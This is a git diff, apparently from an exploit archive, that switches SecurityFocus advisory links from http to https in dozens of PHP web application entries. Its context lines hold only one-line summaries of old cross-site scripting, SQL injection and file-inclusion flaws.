@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10822/info +source: https://www.securityfocus.com/bid/10822/info A cross-site scripting vulnerability is reported to affect Phorum. This issue affects the 'search.php' script. As a result of this vulnerability, it is possible for a remote attacker to create a malicious link containing script code that will be executed in the browser of a legitimate user. diff --git a/exploits/php/webapps/24332.txt b/exploits/php/webapps/24332.txt index ac506d0e7..f0147e6b1 100644 --- a/exploits/php/webapps/24332.txt +++ b/exploits/php/webapps/24332.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10824/info +source: https://www.securityfocus.com/bid/10824/info Comersus Cart is reportedly affected by a remote SQL injection vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI parameter input before using it in an SQL query. diff --git a/exploits/php/webapps/24333.txt b/exploits/php/webapps/24333.txt index 2d408ba7c..590a054e3 100644 --- a/exploits/php/webapps/24333.txt +++ b/exploits/php/webapps/24333.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10825/info +source: https://www.securityfocus.com/bid/10825/info Reportedly Verylost lostBook is affected by an HTML injection vulnerability in its message entry functionality. This issue is due to a failure of the application to properly validate and sanitize user-supplied input before including it in dynamically generated web page content. diff --git a/exploits/php/webapps/24334.txt b/exploits/php/webapps/24334.txt index be64acf4c..07308a74f 100644 --- a/exploits/php/webapps/24334.txt +++ b/exploits/php/webapps/24334.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10826/info +source: https://www.securityfocus.com/bid/10826/info JAWS is reportedly affected by a remote SQL injection vulnerability. This issue occurs in the controlpanel.php script due to a failure of the application to properly sanitize user-supplied URI parameter input before using it in an SQL query. diff --git a/exploits/php/webapps/24340.txt b/exploits/php/webapps/24340.txt index 180ebabce..d8740754a 100644 --- a/exploits/php/webapps/24340.txt +++ b/exploits/php/webapps/24340.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10835/info +source: https://www.securityfocus.com/bid/10835/info A vulnerability is reported for PowerPortal which may make it prone to HTML injection attacks. The problem is said to occur due to a lack of sufficient sanitization performed on private message data. diff --git a/exploits/php/webapps/24341.txt b/exploits/php/webapps/24341.txt index 623449276..bf7e874f7 100644 --- a/exploits/php/webapps/24341.txt +++ b/exploits/php/webapps/24341.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10836/info +source: https://www.securityfocus.com/bid/10836/info It is reported that Fusion News is affected by an administrator command execution vulnerability. This issue is due to a failure of the application to properly validate access to administrative commands. diff --git a/exploits/php/webapps/24348.txt b/exploits/php/webapps/24348.txt index 9ca081b1e..3dd588a6a 100644 --- a/exploits/php/webapps/24348.txt +++ b/exploits/php/webapps/24348.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10856/info +source: https://www.securityfocus.com/bid/10856/info It is reported that eNdonesia is susceptible to a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated web content. 
diff --git a/exploits/php/webapps/24349.txt b/exploits/php/webapps/24349.txt index 586b44223..5d66a5a90 100644 --- a/exploits/php/webapps/24349.txt +++ b/exploits/php/webapps/24349.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10861/info +source: https://www.securityfocus.com/bid/10861/info PHP-Nuke is reported prone to an access control bypass vulnerability. diff --git a/exploits/php/webapps/24356.txt b/exploits/php/webapps/24356.txt index 3894d40b7..f718c5404 100644 --- a/exploits/php/webapps/24356.txt +++ b/exploits/php/webapps/24356.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10884/info +source: https://www.securityfocus.com/bid/10884/info It is reported that Moodle is vulnerable to a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamic web content. diff --git a/exploits/php/webapps/24357.txt b/exploits/php/webapps/24357.txt index ecf5b539d..f4cf08f5a 100644 --- a/exploits/php/webapps/24357.txt +++ b/exploits/php/webapps/24357.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10885/info +source: https://www.securityfocus.com/bid/10885/info PluggedOut Blog is reported prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/24359.php b/exploits/php/webapps/24359.php index df3341330..8de996b08 100644 --- a/exploits/php/webapps/24359.php +++ b/exploits/php/webapps/24359.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10891/info +source: https://www.securityfocus.com/bid/10891/info A vulnerability is reported to exist in YaPiG that may allow a remote attacker to execute malicious scripts on a vulnerable system. This issue exists due to a lack if sanitization of user-supplied data. diff --git a/exploits/php/webapps/24367.txt b/exploits/php/webapps/24367.txt index d338e881b..e490ef8f0 100644 --- a/exploits/php/webapps/24367.txt +++ b/exploits/php/webapps/24367.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10920/info +source: https://www.securityfocus.com/bid/10920/info IceWarp Web Mail is reported prone to multiple input validation vulnerabilities. It is reported that these issues may be exploited by a remote attacker to conduct SQL Injection, Account Manipulation, Cross-site Scripting, Information disclosure, Local file system access, and other attacks. Few details regarding the specific vulnerabilities are known. diff --git a/exploits/php/webapps/24372.txt b/exploits/php/webapps/24372.txt index e7f07e298..73b9ad7dc 100644 --- a/exploits/php/webapps/24372.txt +++ b/exploits/php/webapps/24372.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10948/info +source: https://www.securityfocus.com/bid/10948/info It is reported that CuteNews is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24373.txt b/exploits/php/webapps/24373.txt index 5b8d9dc01..244d613bd 100644 --- a/exploits/php/webapps/24373.txt +++ b/exploits/php/webapps/24373.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10954/info +source: https://www.securityfocus.com/bid/10954/info PScript PForum is reported prone to a HTML injection vulnerability. The vulnerability presents itself due to a lack of sufficient sanitization performed on data submitted through input fields of the PForum user profile form. diff --git a/exploits/php/webapps/24375.txt b/exploits/php/webapps/24375.txt index fa002d66a..db4109bdf 100644 --- a/exploits/php/webapps/24375.txt +++ b/exploits/php/webapps/24375.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10960/info +source: https://www.securityfocus.com/bid/10960/info RaXnet Cacti is reportedly affected by a remote SQL injection vulnerability. This issue occurs in the auth_login.php script due to a failure of the application to properly sanitize user-supplied "username" URI parameter input before using it in an SQL query. diff --git a/exploits/php/webapps/24377.txt b/exploits/php/webapps/24377.txt index a530b8184..a329ef5fc 100644 --- a/exploits/php/webapps/24377.txt +++ b/exploits/php/webapps/24377.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10966/info +source: https://www.securityfocus.com/bid/10966/info The webmail package embedded in Merak Mail Server is reported prone to multiple vulnerabilities. diff --git a/exploits/php/webapps/24378.txt b/exploits/php/webapps/24378.txt index 837a1d5b0..ba3eaf689 100644 --- a/exploits/php/webapps/24378.txt +++ b/exploits/php/webapps/24378.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10966/info +source: https://www.securityfocus.com/bid/10966/info The webmail package embedded in Merak Mail Server is reported prone to multiple vulnerabilities. diff --git a/exploits/php/webapps/24379.txt b/exploits/php/webapps/24379.txt index 022dbb594..69b1463c9 100644 --- a/exploits/php/webapps/24379.txt +++ b/exploits/php/webapps/24379.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10966/info +source: https://www.securityfocus.com/bid/10966/info The webmail package embedded in Merak Mail Server is reported prone to multiple vulnerabilities. diff --git a/exploits/php/webapps/24380.txt b/exploits/php/webapps/24380.txt index 945ddf9a8..dafa904fe 100644 --- a/exploits/php/webapps/24380.txt +++ b/exploits/php/webapps/24380.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10966/info +source: https://www.securityfocus.com/bid/10966/info The webmail package embedded in Merak Mail Server is reported prone to multiple vulnerabilities. diff --git a/exploits/php/webapps/24381.txt b/exploits/php/webapps/24381.txt index f9f6eac47..33db810a8 100644 --- a/exploits/php/webapps/24381.txt +++ b/exploits/php/webapps/24381.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10966/info +source: https://www.securityfocus.com/bid/10966/info The webmail package embedded in Merak Mail Server is reported prone to multiple vulnerabilities. diff --git a/exploits/php/webapps/24382.txt b/exploits/php/webapps/24382.txt index be77f7440..1fdffed12 100644 --- a/exploits/php/webapps/24382.txt +++ b/exploits/php/webapps/24382.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10966/info +source: https://www.securityfocus.com/bid/10966/info The webmail package embedded in Merak Mail Server is reported prone to multiple vulnerabilities. diff --git a/exploits/php/webapps/24383.php b/exploits/php/webapps/24383.php index ba20833a1..1d7820dcf 100644 --- a/exploits/php/webapps/24383.php +++ b/exploits/php/webapps/24383.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10968/info +source: https://www.securityfocus.com/bid/10968/info A vulnerability is reported to exist in Gallery that may allow a remote attacker to execute malicious scripts on a vulnerable system. This issue is a design error that occurs due to the 'set_time_limit' function. diff --git a/exploits/php/webapps/24384.txt b/exploits/php/webapps/24384.txt index d9cd2b857..b74f3a0e5 100644 --- a/exploits/php/webapps/24384.txt +++ b/exploits/php/webapps/24384.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10974/info +source: https://www.securityfocus.com/bid/10974/info It is reported that PHP-Fusion is susceptible to a database backup information disclosure vulnerability. An anonymous remote attacker may be able to download a complete database backup from the server. Authentication would not be required. diff --git a/exploits/php/webapps/24389.txt b/exploits/php/webapps/24389.txt index 1ee530783..ddd02022d 100644 --- a/exploits/php/webapps/24389.txt +++ b/exploits/php/webapps/24389.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10992/info +source: https://www.securityfocus.com/bid/10992/info An HTML injection vulnerability is reported in Sympa. The problem occurs due to a failure of the application to properly sanitize user-supplied input data. diff --git a/exploits/php/webapps/24390.txt b/exploits/php/webapps/24390.txt index beb0bf30b..7369d1966 100644 --- a/exploits/php/webapps/24390.txt +++ b/exploits/php/webapps/24390.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10993/info +source: https://www.securityfocus.com/bid/10993/info Mantix is reportedly susceptible to a remote server-side script execution vulnerability. This vulnerability only presents itself when PHP is configured on the hosting computer with 'register_globals = on'. diff --git a/exploits/php/webapps/24391.txt b/exploits/php/webapps/24391.txt index c8653ac5e..26184bbb0 100644 --- a/exploits/php/webapps/24391.txt +++ b/exploits/php/webapps/24391.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10994/info +source: https://www.securityfocus.com/bid/10994/info Mantis is a web-based bug tracking system. It is written in PHP and supported by a MySQL database. diff --git a/exploits/php/webapps/24392.php b/exploits/php/webapps/24392.php index b23c0fe7a..45278ac03 100644 --- a/exploits/php/webapps/24392.php +++ b/exploits/php/webapps/24392.php 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10995/info +source: https://www.securityfocus.com/bid/10995/info Mantis is reportedly susceptible to a vulnerability in its signup process allowing mass email attacks. diff --git a/exploits/php/webapps/24393.txt b/exploits/php/webapps/24393.txt index d09fe5177..f7f06c4b5 100644 --- a/exploits/php/webapps/24393.txt +++ b/exploits/php/webapps/24393.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10996/info +source: https://www.securityfocus.com/bid/10996/info MyDMS is reportedly susceptible to both a directory traversal vulnerability and an SQL injection vulnerability. diff --git a/exploits/php/webapps/24399.txt b/exploits/php/webapps/24399.txt index 9caf10b1e..67298667c 100644 --- a/exploits/php/webapps/24399.txt +++ b/exploits/php/webapps/24399.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11009/info +source: https://www.securityfocus.com/bid/11009/info It is reported that PhotoADay is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24403.txt b/exploits/php/webapps/24403.txt index dbff7754f..c51f95a8b 100644 --- a/exploits/php/webapps/24403.txt +++ b/exploits/php/webapps/24403.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11013/info +source: https://www.securityfocus.com/bid/11013/info It is reported that eGroupWare is susceptible to multiple cross-site scripting and HTML injection vulnerabilities. diff --git a/exploits/php/webapps/24405.txt b/exploits/php/webapps/24405.txt index d316df04e..88259bc74 100644 --- a/exploits/php/webapps/24405.txt +++ b/exploits/php/webapps/24405.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11024/info +source: https://www.securityfocus.com/bid/11024/info It is reported that Plesk Reloaded may be affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24410.txt b/exploits/php/webapps/24410.txt index d55511497..d11f5f60a 100644 --- a/exploits/php/webapps/24410.txt +++ b/exploits/php/webapps/24410.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11038/info +source: https://www.securityfocus.com/bid/11038/info PHP Code Snippet Library is reported prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24415.txt b/exploits/php/webapps/24415.txt index 088fababf..38687637d 100644 --- a/exploits/php/webapps/24415.txt +++ b/exploits/php/webapps/24415.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11064/info +source: https://www.securityfocus.com/bid/11064/info Reportedly the XOOPS Dictionary Module by Nagle is affected by multiple cross-site scripting vulnerabilities. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24424.txt b/exploits/php/webapps/24424.txt index 6227ac124..19104959d 100644 --- a/exploits/php/webapps/24424.txt +++ b/exploits/php/webapps/24424.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11086/info +source: https://www.securityfocus.com/bid/11086/info DasBlog is reportedly susceptible to an HTML injection vulnerability in its request log. This vulnerability is due to a failure of the application to properly sanitize user-supplied input data before using it in the generation of dynamic web pages. diff --git a/exploits/php/webapps/24425.txt b/exploits/php/webapps/24425.txt index 6d5c27f48..1bf3fd37d 100644 
--- a/exploits/php/webapps/24425.txt +++ b/exploits/php/webapps/24425.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11088/info +source: https://www.securityfocus.com/bid/11088/info It is reported that phpWebSite is susceptible to multiple cross-site scripting, HTML injection and SQL injection vulnerabilities. diff --git a/exploits/php/webapps/24565.txt b/exploits/php/webapps/24565.txt index f15a3d300..e24c876f6 100644 --- a/exploits/php/webapps/24565.txt +++ b/exploits/php/webapps/24565.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11095/info +source: https://www.securityfocus.com/bid/11095/info MailWorks Professional is reported prone to an authentication bypass vulnerability. diff --git a/exploits/php/webapps/24566.txt b/exploits/php/webapps/24566.txt index 0a811bd92..2322be339 100644 --- a/exploits/php/webapps/24566.txt +++ b/exploits/php/webapps/24566.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11097/info +source: https://www.securityfocus.com/bid/11097/info It is reported that CuteNews is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24575.txt b/exploits/php/webapps/24575.txt index 9d2d94316..82437785c 100644 --- a/exploits/php/webapps/24575.txt +++ b/exploits/php/webapps/24575.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11124/info +source: https://www.securityfocus.com/bid/11124/info PSNews is a Web application that is implemented in PHP. diff --git a/exploits/php/webapps/24582.txt b/exploits/php/webapps/24582.txt index e17b1ddf5..435d16365 100644 --- a/exploits/php/webapps/24582.txt +++ b/exploits/php/webapps/24582.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11133/info +source: https://www.securityfocus.com/bid/11133/info Regulus is reported prone to an information disclosure vulnerability. It is reported that a specified user/customer password hash is contained in a hidden tag of the 'Update Your Password' action page. diff --git a/exploits/php/webapps/24583.txt b/exploits/php/webapps/24583.txt index 859c18483..a321b3830 100644 --- a/exploits/php/webapps/24583.txt +++ b/exploits/php/webapps/24583.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11134/info +source: https://www.securityfocus.com/bid/11134/info Regulus is reported prone to an information disclosure vulnerability. It is reported that it is possible to view a target users connection statistics without requiring valid credentials. diff --git a/exploits/php/webapps/24585.txt b/exploits/php/webapps/24585.txt index ba2c157bc..76f676a67 100644 --- a/exploits/php/webapps/24585.txt +++ b/exploits/php/webapps/24585.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11146/info +source: https://www.securityfocus.com/bid/11146/info BBS E-Market Professional is reported to be affected by a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. diff --git a/exploits/php/webapps/24587.txt b/exploits/php/webapps/24587.txt index ac002896e..08ec876d7 100644 --- a/exploits/php/webapps/24587.txt +++ b/exploits/php/webapps/24587.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11148/info +source: https://www.securityfocus.com/bid/11148/info Reportedly the PostNuke Modules Factory Subjects module is affected by a remote SQL injection vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI parameters. diff --git a/exploits/php/webapps/24601.txt b/exploits/php/webapps/24601.txt index 08d9661f0..3bf8701da 100644 
--- a/exploits/php/webapps/24601.txt +++ b/exploits/php/webapps/24601.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11191/info +source: https://www.securityfocus.com/bid/11191/info BBS E-Market Professional is reported prone to multiple file disclosure vulnerabilities. These issues exist due to insufficient sanitization of user-supplied data. diff --git a/exploits/php/webapps/24613.txt b/exploits/php/webapps/24613.txt index 2a685538a..682fa406b 100644 --- a/exploits/php/webapps/24613.txt +++ b/exploits/php/webapps/24613.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11219/info +source: https://www.securityfocus.com/bid/11219/info It is reported that the ReMOSitory module for Mambo is prone to an SQL injection vulnerability. This issue is due to a failure of the module to properly validate user supplied URI input. diff --git a/exploits/php/webapps/24614.txt b/exploits/php/webapps/24614.txt index 119d8d02e..d13fa926a 100644 --- a/exploits/php/webapps/24614.txt +++ b/exploits/php/webapps/24614.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11220/info +source: https://www.securityfocus.com/bid/11220/info Mambo open source is reportedly affected by multiple input validation vulnerabilities. These issues are due to a failure of the application to properly validate user-supplied URI parameters. diff --git a/exploits/php/webapps/24615.txt b/exploits/php/webapps/24615.txt index d8e2aeb83..c1e27427c 100644 --- a/exploits/php/webapps/24615.txt +++ b/exploits/php/webapps/24615.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11220/info +source: https://www.securityfocus.com/bid/11220/info Mambo open source is reportedly affected by multiple input validation vulnerabilities. These issues are due to a failure of the application to properly validate user-supplied URI parameters. diff --git a/exploits/php/webapps/24616.txt b/exploits/php/webapps/24616.txt index 373b1bcca..3de939ad0 100644 
--- a/exploits/php/webapps/24616.txt +++ b/exploits/php/webapps/24616.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11221/info +source: https://www.securityfocus.com/bid/11221/info Tutos is reported prone to multiple remote input-validation vulnerabilities. These issues exist due to insufficient sanitization of user-supplied data and may allow an attacker to carry out cross-site scripting and SQL-injection attacks. diff --git a/exploits/php/webapps/24617.txt b/exploits/php/webapps/24617.txt index 7c37da1ba..d49471cad 100644 --- a/exploits/php/webapps/24617.txt +++ b/exploits/php/webapps/24617.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11221/info +source: https://www.securityfocus.com/bid/11221/info Tutos is reported prone to multiple remote input-validation vulnerabilities. These issues exist due to insufficient sanitization of user-supplied data and may allow an attacker to carry out cross-site scripting and SQL-injection attacks. diff --git a/exploits/php/webapps/24638.txt b/exploits/php/webapps/24638.txt index 9a80bcc90..b4762e968 100644 --- a/exploits/php/webapps/24638.txt +++ b/exploits/php/webapps/24638.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11260/info +source: https://www.securityfocus.com/bid/11260/info A vulnerability is reported to exist in the @lexPHPTeam @lex Guestbook software that may allow an attacker to include malicious PHP files containing arbitrary code to be executed on a vulnerable system. The issue exists due to improper validation of user-supplied data. diff --git a/exploits/php/webapps/24641.txt b/exploits/php/webapps/24641.txt index a2f9e1d87..fde8c9042 100644 --- a/exploits/php/webapps/24641.txt +++ b/exploits/php/webapps/24641.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11268/info +source: https://www.securityfocus.com/bid/11268/info It is reported that Wordpress is affected by various cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24642.txt b/exploits/php/webapps/24642.txt index d7b729763..8bd58833e 100644 --- a/exploits/php/webapps/24642.txt +++ b/exploits/php/webapps/24642.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11268/info +source: https://www.securityfocus.com/bid/11268/info It is reported that Wordpress is affected by various cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24643.txt b/exploits/php/webapps/24643.txt index ea82fda13..92b9d67d5 100644 --- a/exploits/php/webapps/24643.txt +++ b/exploits/php/webapps/24643.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11268/info +source: https://www.securityfocus.com/bid/11268/info It is reported that Wordpress is affected by various cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24644.txt b/exploits/php/webapps/24644.txt index 19a173cd0..07f6e1f89 100644 --- a/exploits/php/webapps/24644.txt +++ b/exploits/php/webapps/24644.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11268/info +source: https://www.securityfocus.com/bid/11268/info It is reported that Wordpress is affected by various cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24645.txt b/exploits/php/webapps/24645.txt index b6e53a571..315f1f02b 100644 --- a/exploits/php/webapps/24645.txt +++ b/exploits/php/webapps/24645.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11268/info +source: https://www.securityfocus.com/bid/11268/info It is reported that Wordpress is affected by various cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24646.txt b/exploits/php/webapps/24646.txt index c2cce6acf..7221d2801 100644 --- a/exploits/php/webapps/24646.txt +++ b/exploits/php/webapps/24646.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11268/info +source: https://www.securityfocus.com/bid/11268/info It is reported that Wordpress is affected by various cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24647.txt b/exploits/php/webapps/24647.txt index 38c95161a..f8251c5f7 100644 --- a/exploits/php/webapps/24647.txt +++ b/exploits/php/webapps/24647.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11272/info +source: https://www.securityfocus.com/bid/11272/info It is reported that ParaChat is susceptible to a directory traversal vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input data. diff --git a/exploits/php/webapps/24648.txt b/exploits/php/webapps/24648.txt index 37cd2b10b..e13bbb521 100644 --- a/exploits/php/webapps/24648.txt +++ b/exploits/php/webapps/24648.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11283/info +source: https://www.securityfocus.com/bid/11283/info Multiple vulnerabilities are reported to affect the application. These issues arise due to insufficient sanitization of user-supplied data. A remote attacker may leverage these vulnerabilities to carry out SQL injection, cross-site scripting, and HTTP response splitting attacks. diff --git a/exploits/php/webapps/24649.txt b/exploits/php/webapps/24649.txt index 34e13448f..d1084ff75 100644 
--- a/exploits/php/webapps/24649.txt +++ b/exploits/php/webapps/24649.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11283/info +source: https://www.securityfocus.com/bid/11283/info Multiple vulnerabilities are reported to affect the application. These issues arise due to insufficient sanitization of user-supplied data. A remote attacker may leverage these vulnerabilities to carry out SQL injection, cross-site scripting, and HTTP response splitting attacks. diff --git a/exploits/php/webapps/24650.txt b/exploits/php/webapps/24650.txt index 384815a97..5187654a4 100644 --- a/exploits/php/webapps/24650.txt +++ b/exploits/php/webapps/24650.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11283/info +source: https://www.securityfocus.com/bid/11283/info Multiple vulnerabilities are reported to affect the application. These issues arise due to insufficient sanitization of user-supplied data. A remote attacker may leverage these vulnerabilities to carry out SQL injection, cross-site scripting, and HTTP response splitting attacks. diff --git a/exploits/php/webapps/24651.txt b/exploits/php/webapps/24651.txt index 000132730..6dd33d2d9 100644 --- a/exploits/php/webapps/24651.txt +++ b/exploits/php/webapps/24651.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11283/info +source: https://www.securityfocus.com/bid/11283/info Multiple vulnerabilities are reported to affect the application. These issues arise due to insufficient sanitization of user-supplied data. A remote attacker may leverage these vulnerabilities to carry out SQL injection, cross-site scripting, and HTTP response splitting attacks. diff --git a/exploits/php/webapps/24652.txt b/exploits/php/webapps/24652.txt index 21e47279b..a66a5df3d 100644 --- a/exploits/php/webapps/24652.txt +++ b/exploits/php/webapps/24652.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11283/info +source: https://www.securityfocus.com/bid/11283/info Multiple vulnerabilities are reported to affect the application. These issues arise due to insufficient sanitization of user-supplied data. A remote attacker may leverage these vulnerabilities to carry out SQL injection, cross-site scripting, and HTTP response splitting attacks. diff --git a/exploits/php/webapps/24655.txt b/exploits/php/webapps/24655.txt index 9fbde2e6f..5be04d236 100644 --- a/exploits/php/webapps/24655.txt +++ b/exploits/php/webapps/24655.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11329/info +source: https://www.securityfocus.com/bid/11329/info PHPLinks is reported prone to multiple input validation vulnerabilities. diff --git a/exploits/php/webapps/24657.txt b/exploits/php/webapps/24657.txt index b2ccd7cff..ffd712b57 100644 --- a/exploits/php/webapps/24657.txt +++ b/exploits/php/webapps/24657.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11336/info +source: https://www.securityfocus.com/bid/11336/info BlackBoard Internet Newsboard System is reported prone to a remote file include vulnerability. This issue presents itself because the application fails to sanitize user-supplied data properly. This issue may allow an attacker to include malicious files containing arbitrary script code to be executed on a vulnerable computer. diff --git a/exploits/php/webapps/24659.txt b/exploits/php/webapps/24659.txt index f398e078d..da0232eb7 100644 --- a/exploits/php/webapps/24659.txt +++ b/exploits/php/webapps/24659.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11338/info +source: https://www.securityfocus.com/bid/11338/info DCP-Portal is reported prone to multiple cross-site scripting vulnerabilities. It is reported that DCP-Portal does not sufficiently filter URI parameters supplied to several scripts. 
diff --git a/exploits/php/webapps/24660.txt b/exploits/php/webapps/24660.txt index 913f53797..3d99cf20e 100644 --- a/exploits/php/webapps/24660.txt +++ b/exploits/php/webapps/24660.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11338/info +source: https://www.securityfocus.com/bid/11338/info DCP-Portal is reported prone to multiple cross-site scripting vulnerabilities. It is reported that DCP-Portal does not sufficiently filter URI parameters supplied to several scripts. diff --git a/exploits/php/webapps/24661.txt b/exploits/php/webapps/24661.txt index 60146207a..5975e9dc0 100644 --- a/exploits/php/webapps/24661.txt +++ b/exploits/php/webapps/24661.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11338/info +source: https://www.securityfocus.com/bid/11338/info DCP-Portal is reported prone to multiple cross-site scripting vulnerabilities. It is reported that DCP-Portal does not sufficiently filter URI parameters supplied to several scripts. diff --git a/exploits/php/webapps/24662.txt b/exploits/php/webapps/24662.txt index ff76a392f..c6143d4c6 100644 --- a/exploits/php/webapps/24662.txt +++ b/exploits/php/webapps/24662.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11338/info +source: https://www.securityfocus.com/bid/11338/info DCP-Portal is reported prone to multiple cross-site scripting vulnerabilities. It is reported that DCP-Portal does not sufficiently filter URI parameters supplied to several scripts. diff --git a/exploits/php/webapps/24663.txt b/exploits/php/webapps/24663.txt index bad9abced..c0dee301e 100644 --- a/exploits/php/webapps/24663.txt +++ b/exploits/php/webapps/24663.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11338/info +source: https://www.securityfocus.com/bid/11338/info DCP-Portal is reported prone to multiple cross-site scripting vulnerabilities. It is reported that DCP-Portal does not sufficiently filter URI parameters supplied to several scripts. 
